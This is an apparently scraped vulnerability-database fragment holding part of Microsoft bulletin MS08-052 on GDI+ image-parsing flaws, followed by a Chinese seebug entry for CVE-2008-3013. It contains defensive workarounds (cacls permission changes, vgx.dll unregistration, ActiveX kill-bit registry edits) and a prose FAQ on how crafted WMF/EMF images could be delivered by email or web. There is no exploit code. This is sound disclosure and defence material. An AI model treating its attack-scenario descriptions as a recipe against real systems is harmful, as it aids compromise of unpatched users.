Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for GDI+ WMF Buffer Overrun Vulnerability - CVE-2008-3014\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRestrict access to gdiplus.dll\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VGX\vgx.dll" /E /P everyone:N\r\n\r\n2. Restart\r\n\r\nImpact of workaround. Windows Picture and Fax Viewer (on editions prior to Windows Vista) and other applications that rely on GDI+ will not be able to view images. Also, thumbnails in Windows Explorer (on versions prior to Vista) will not display.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Run the following commands from an elevated administrator command prompt\r\n\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\Microsoft.NET\Framework\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\winsxs\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\Downloaded Program Files\gdiplus.dll^"') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\microsoft office\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft Shared\VFP\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 8\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Visual FoxPro 9\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Digital Image 2006\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Common Files\Microsoft shared\Works Shared\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\Microsoft Works\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\ Common Files\Microsoft Shared\VGX\vgx.dll" /E /R everyone\r\n\r\n2. Restart\r\n\u2022\t\r\n\r\nUnregister vgx.dll\r\nTo mitigate the Web-based attack vector:\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of workaround. Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nHow to undo the workaround.\r\n\r\n1. Click Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2. A dialog box appears to confirm that the registration process has succeeded. Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nPrevent RSClientPrint from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate RSClientPrint in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps in this article to create a Compatibility Flags value in the registry to prevent RSClientPrint from being instantiated in Internet Explorer.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround.\r\n\r\nPaste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA91DF8D-53AB-455D-AB20-F2F023E498D3}]\r\n\r\n"Compatibility Flags"=-\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for GDI+ WMF Buffer Overrun Vulnerability - CVE-2008-3014\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by a buffer overrun when GDI+ improperly allocates memory when parsing a specially crafted WMF image file.\r\n\r\nWhat is theWindows Metafile (WMF) image format? \r\nA WMF image is a 16-bit metafile format that can contain both vector information and bitmap information. It is optimized for the Windows operating system.\r\n\r\nFor more information about image types and formats, see Microsoft Knowledge Base Article 320314. Additional information about these file formats is also available at the MSDN Library Web Site.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open or view a specially crafted image file.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially-crafted EMF image file or an Office document with a specially-crafted EMF image file embedded in it to the user and by convincing the user to open the document or view the e-mail containing the specially crafted image file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by modifying the way that GDI+ allocates memory for WMF image files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nGDI+ BMP Integer Overflow Vulnerability - CVE-2008-3015\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nGreg MacManus of VeriSign iDefense Labs for reporting the GDI+ VML Buffer Overrun Vulnerability (CVE-2007-5348)\r\n\u2022\t\r\n\r\nBing Liu of Fortinet's FortiGuard Global Security Research Team for reporting the GDI+ EMF Memory Corruption Vulnerability (CVE-2008-3012)\r\n\u2022\t\r\n\r\nPeter Winter-Smith of NGSSoftware and Ivan Fratric working with Zero Day Initiative for reporting the GDI+ GIF Parsing Vulnerability (CVE-2008-3013)\r\n\u2022\t\r\n\r\nVulnerability Research Team, Assurent Secure Technologies for reporting the GDI+ WMF Buffer Overrun Vulnerability (CVE-2008-3014)\r\n\u2022\t\r\n\r\nAn anonymous researcher working with Zero Day Initiative for reporting the GDI+ BMP Integer Overflow Vulnerability (CVE-2008-3015)\r\nTop of sectionTop of section\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\nTop of sectionTop of section\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (September 9, 2008): Bulletin published.", "edition": 1, "modified": "2008-09-10T00:00:00", "published": "2008-09-10T00:00:00", "id": "SECURITYVULNS:DOC:20482", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20482", "title": "Microsoft Security Bulletin MS08-052 \u2013 Critical Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:29:01", "description": "BUGTRAQ ID: 31020\r\nCVE ID\uff1aCVE-2008-3013\r\nCNCVE ID\uff1aCNCVE-20083013\r\n\r\nMicrosoft Windows\u662f\u4e00\u6b3e\u5fae\u8f6f\u5f00\u53d1\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nMicrosoft Windows GDI+\u5b50\u7cfb\u7edf\u89e3\u6790\u7279\u6b8a\u6784\u5efa\u7684GIF\u6587\u4ef6\u5b58\u5728\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u8fdb\u884c\u5185\u5b58\u7834\u574f\uff0c\u53ef\u5bfc\u81f4\u4ee5\u767b\u5f55\u7528\u6237\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\u63d0\u4f9b\u7578\u5f62\u7684\u56fe\u5f62\u6269\u5c55\u6269\u5c55\u53ef\u89e6\u53d1\u53ef\u5229\u7528\u7684\u5185\u5b58\u7834\u574f\u6761\u4ef6\uff0c\u6784\u5efa\u7279\u6b8a\u7684GIF\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u89e6\u53d1\u6b64\u6f0f\u6d1e\u3002\r\n \r\n\n\nMicrosoft Works 8.0\r\nMicrosoft Windows XP Professional x64 Edition SP2\r\nMicrosoft Windows XP Professional x64 Edition \r\nMicrosoft Windows XP Professional SP3\r\nMicrosoft Windows XP Professional SP2\r\nMicrosoft Windows XP Professional SP1\r\nMicrosoft Windows XP Professional \r\nMicrosoft Windows XP Media Center Edition SP3\r\nMicrosoft Windows XP Media Center Edition SP2\r\nMicrosoft Windows XP Media Center Edition SP1\r\nMicrosoft Windows XP Media Center Edition \r\nMicrosoft Windows XP Home SP3\r\nMicrosoft Windows XP Home SP2\r\nMicrosoft Windows XP Home SP1\r\nMicrosoft Windows XP Home \r\nMicrosoft Windows XP Gold 0\r\nMicrosoft Windows XP 64-bit Edition SP1\r\nMicrosoft Windows XP 64-bit Edition \r\nMicrosoft Windows XP 0\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP1\r\nMicrosoft Windows Vista Ultimate 64-bit edition 0\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP1\r\nMicrosoft Windows Vista Home Premium 64-bit edition 0\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP1\r\nMicrosoft Windows Vista Home Basic 64-bit edition 0\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP1\r\nMicrosoft Windows Vista Enterprise 64-bit edition 0\r\nMicrosoft Windows Vista Business 64-bit edition SP1\r\nMicrosoft Windows Vista Business 64-bit edition 0\r\nMicrosoft Windows Vista Ultimate SP1\r\nMicrosoft Windows Vista Ultimate\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista Home Premium SP1\r\nMicrosoft Windows Vista Home Premium\r\nMicrosoft Windows Vista Home Basic SP1\r\nMicrosoft Windows Vista Home Basic\r\nMicrosoft Windows Vista Enterprise SP1\r\nMicrosoft Windows Vista Enterprise\r\nMicrosoft Windows Vista Business SP1\r\nMicrosoft Windows Vista Business\r\nMicrosoft Windows Vista 0\r\nMicrosoft Windows Server 2008 Standard Edition 0\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Windows Server 2008 Enterprise Edition 0\r\nMicrosoft Windows Server 2008 Datacenter Edition 0\r\nMicrosoft Windows Server 2003 x64 SP2\r\nMicrosoft Windows Server 2003 x64 SP1\r\nMicrosoft Windows Server 2003 Web Edition SP2\r\nMicrosoft Windows Server 2003 Web Edition SP1\r\nMicrosoft Windows Server 2003 Web Edition \r\nMicrosoft Windows Server 2003 Standard x64 Edition \r\nMicrosoft Windows Server 2003 Standard Edition SP2\r\nMicrosoft Windows Server 2003 Standard Edition SP1\r\nMicrosoft Windows Server 2003 Standard Edition \r\nMicrosoft Windows Server 2003 Itanium SP2\r\nMicrosoft Windows Server 2003 Itanium SP1\r\nMicrosoft Windows Server 2003 Itanium 0\r\nMicrosoft Windows Server 2003 Enterprise x64 Edition SP2\r\nMicrosoft Windows Server 2003 Enterprise x64 Edition \r\nMicrosoft Windows Server 2003 Enterprise Edition Itanium SP1\r\nMicrosoft Windows Server 2003 Enterprise Edition Itanium 0\r\nMicrosoft Windows Server 2003 Enterprise Edition SP1\r\nMicrosoft Windows Server 2003 Enterprise Edition \r\nMicrosoft Windows Server 2003 Datacenter x64 Edition SP2\r\nMicrosoft Windows Server 2003 Datacenter x64 Edition \r\nMicrosoft Windows Server 2003 Datacenter Edition Itanium SP1\r\nMicrosoft Windows Server 2003 Datacenter Edition Itanium 0\r\nMicrosoft Windows Server 2003 Datacenter Edition SP1\r\nMicrosoft Windows Server 2003 Datacenter Edition \r\nMicrosoft Visual Studio 2003 Viewer\r\nMicrosoft Visio 2002 Standard SP2\r\nMicrosoft Visio 2002 Professional SP2\r\nMicrosoft Visio 2002 SP2\r\nMicrosoft Visio 2002 SP1\r\nMicrosoft Visio 2002 \r\nMicrosoft SQL Server 2005 x64 Edition SP2\r\nMicrosoft SQL Server 2005 x64 Edition SP1\r\nMicrosoft SQL Server 2005 Itanium Edition SP2\r\nMicrosoft SQL Server 2005 Itanium Edition SP1\r\nMicrosoft SQL Server 2005 Itanium Edition 0\r\nMicrosoft SQL Server 2005 Express Edition with Advanced Serv SP2\r\nMicrosoft SQL Server 2005 Express Edition with Advanced Serv SP1\r\nMicrosoft SQL Server 2005 Express Edition SP2\r\nMicrosoft SQL Server 2005 Express Edition SP1\r\nMicrosoft SQL Server 2005 Express Edition 0\r\nMicrosoft SQL Server 2005 SP2\r\nMicrosoft SQL Server 2005 SP1\r\nMicrosoft SQL Server 2005 0\r\nMicrosoft SQL Server 2000 Reporting Services SP2\r\nMicrosoft Report Viewer 2008 0\r\nMicrosoft Report Viewer 2005 SP1\r\nMicrosoft Office XP SP3\r\n+ Microsoft Excel 2002 SP3\r\n+ Microsoft FrontPage 2002 SP3\r\n+ Microsoft Outlook 2002 SP3\r\n+ Microsoft PowerPoint 2002 SP3\r\n+ Microsoft Publisher 2002 SP3\r\nMicrosoft Office XP SP2\r\nMicrosoft Office XP SP1\r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional \r\n- Microsoft Windows 98 \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT Workstation 4.0 SP6a\r\n- Microsoft Windows NT Workstation 4.0 SP6\r\n- Microsoft Windows NT Workstation 4.0 SP5\r\n- Microsoft Windows NT Workstation 4.0 SP4\r\n- Microsoft Windows NT Workstation 4.0 SP3\r\n- Microsoft Windows NT Workstation 4.0 SP2\r\n- Microsoft Windows NT Workstation 4.0 SP1\r\n- Microsoft Windows NT Workstation 4.0\r\n- Microsoft Windows XP Home \r\n- Microsoft Windows XP Professional \r\nMicrosoft Office XP \r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional \r\n- Microsoft Windows 98 \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT Workstation 4.0 SP6a\r\n- Microsoft Windows NT Workstation 4.0 SP6\r\n- Microsoft Windows NT Workstation 4.0 SP5\r\n- Microsoft Windows NT Workstation 4.0 SP4\r\n- Microsoft Windows NT Workstation 4.0 SP3\r\n- Microsoft Windows NT Workstation 4.0 SP2\r\n- Microsoft Windows NT Workstation 4.0 SP1\r\n- Microsoft Windows NT Workstation 4.0\r\n- Microsoft Windows XP Home \r\n- Microsoft Windows XP Professional \r\nMicrosoft Office 2007 SP1\r\nMicrosoft Office 2007 0\r\nMicrosoft Office 2003 SP3\r\nMicrosoft Internet Explorer 6.0 SP1\r\nMicrosoft Internet Explorer 6.0\r\n- Microsoft Windows 2000 Advanced Server SP2\r\n- Microsoft Windows 2000 Advanced Server SP1\r\n- Microsoft Windows 2000 Advanced Server\r\n- Microsoft Windows 2000 Datacenter Server SP2\r\n- Microsoft Windows 2000 Datacenter Server SP1\r\n- Microsoft Windows 2000 Datacenter Server \r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional\r\n- Microsoft Windows 2000 Server SP2\r\n- Microsoft Windows 2000 Server SP1\r\n- Microsoft Windows 2000 Server \r\n- Microsoft Windows 2000 Terminal Services SP2\r\n- Microsoft Windows 2000 Terminal Services SP1\r\n- Microsoft Windows 2000 Terminal Services\r\n- Microsoft Windows 98 \r\n- Microsoft Windows 98SE \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT 4.0 SP6a\r\n- Microsoft Windows NT Enterprise Server 4.0 SP6a\r\n- Microsoft Windows NT Server 4.0 SP6a\r\n- Microsoft Windows NT Terminal Server 4.0 SP6a\r\n- Microsoft Windows NT Workstation 4.0 SP6a\r\n+ Microsoft Windows Server 2003 Datacenter Edition \r\n+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0\r\n+ Microsoft Windows Server 2003 Enterprise Edition \r\n+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0\r\n+ Microsoft Windows Server 2003 Standard Edition \r\n+ Microsoft Windows Server 2003 Web Edition \r\n+ Microsoft Windows XP Home \r\n+ Microsoft Windows XP Professional \r\nMicrosoft Forefront Client Security 1.0\r\nMicrosoft Digital Image Suite 2006\r\n3DM Software Disk Management Software SP2\r\n3DM Software Disk Management Software SP1\r\n\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6848\u53ef\u53c2\u8003\u5982\u4e0b\uff1a\r\n-\u9650\u5236\u5bf9gdiplus.dll\u7684\u8bbf\u95ee\r\n1\uff0c\u5728\u7ba1\u7406\u5458\u547d\u4ee4\u884c\u4e2d\u8fd0\u884c\u5982\u4e0b\u547d\u4ee4\uff1a\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\\Microsoft.NET\\Framework\\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\\winsxs\\gdiplus.dll') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\\Downloaded Program Files\\gdiplus.dll^"') DO cacls %G /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\\microsoft office\\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\\microsoft office\\gdiplus.dll^"') DO cacls "%G" /E /P everyone:N\r\ncacls "%programfiles%\\Common Files\\Microsoft Shared\\VFP\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Common Files\\Microsoft Shared\\VFP\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Microsoft Visual FoxPro 8\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Microsoft Visual FoxPro 8\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Microsoft Visual FoxPro 9\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Microsoft Visual FoxPro 9\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Microsoft Digital Image 2006\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Microsoft Digital Image 2006\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Common Files\\Microsoft shared\\Works Shared\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Common Files\\Microsoft shared\\Works Shared\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Microsoft Works\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Microsoft Works\\gdiplus.dll" /E /P everyone:N\r\ncacls "%programfiles%\\Common Files\\Microsoft Shared\\VGX\\vgx.dll" /E /P everyone:N\r\ncacls "%programfiles(x86)%\\Common Files\\Microsoft Shared\\VGX\\vgx.dll" /E /P everyone:N\r\n2\uff0c\u91cd\u65b0\u542f\u52a8\r\n \r\n\u600e\u6837\u6062\u590d\u521a\u624d\u7684\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\uff1a\r\n1\uff0c\u5728\u7ba1\u7406\u5458\u547d\u4ee4\u884c\u4e2d\u8fd0\u884c\u5982\u4e0b\u547d\u4ee4\uff1a\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\\Microsoft.NET\\Framework\\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s %windir%\\winsxs\\gdiplus.dll') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%windir%\\Downloaded Program Files\\gdiplus.dll^"') DO cacls %G /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles%\\microsoft office\\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\nfor /F "tokens=*" %G IN ('dir /b /s ^"%programfiles^(86^)%\\microsoft office\\gdiplus.dll^"') DO cacls "%G" /E /R everyone\r\ncacls "%programfiles%\\Common Files\\Microsoft Shared\\VFP\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Common Files\\Microsoft Shared\\VFP\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\Microsoft Visual FoxPro 8\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Microsoft Visual FoxPro 8\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\Microsoft Visual FoxPro 9\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Microsoft Visual FoxPro 9\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\Microsoft Digital Image 2006\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Microsoft Digital Image 2006\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\Common Files\\Microsoft shared\\Works Shared\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Common Files\\Microsoft shared\\Works Shared\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\Microsoft Works\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\Microsoft Works\\gdiplus.dll" /E /R everyone\r\ncacls "%programfiles%\\ Common Files\\Microsoft Shared\\VGX\\vgx.dll" /E /R everyone\r\ncacls "%programfiles(x86)%\\ Common Files\\Microsoft Shared\\VGX\\vgx.dll" /E /R everyone\r\n \r\n-\u53cd\u6ce8\u518cvgx.dll\r\n1\uff0c\u70b9\u51fb\u2018\u5f00\u59cb\u2019\uff0c\u70b9\u2018\u8fd0\u884c\u2019\uff0c\u8f93\u5165"%SystemRoot%\\System32\\regsvr32.exe" -u "%CommonProgramFiles%\\Microsoft Shared\\VGX\\vgx.dll"\uff0c\u7136\u540e\u70b9\u51fb\u2019\u786e\u5b9a\u2018\u3002\r\n2\uff0c\u51fa\u73b0\u8bc1\u5b9e\u53cd\u6ce8\u518c\u5904\u7406\u6210\u529f\u7684\u5bf9\u8bdd\u6846\u540e\uff0c\u70b9\u51fb\u2019\u786e\u5b9a\u2018\u3002\r\n 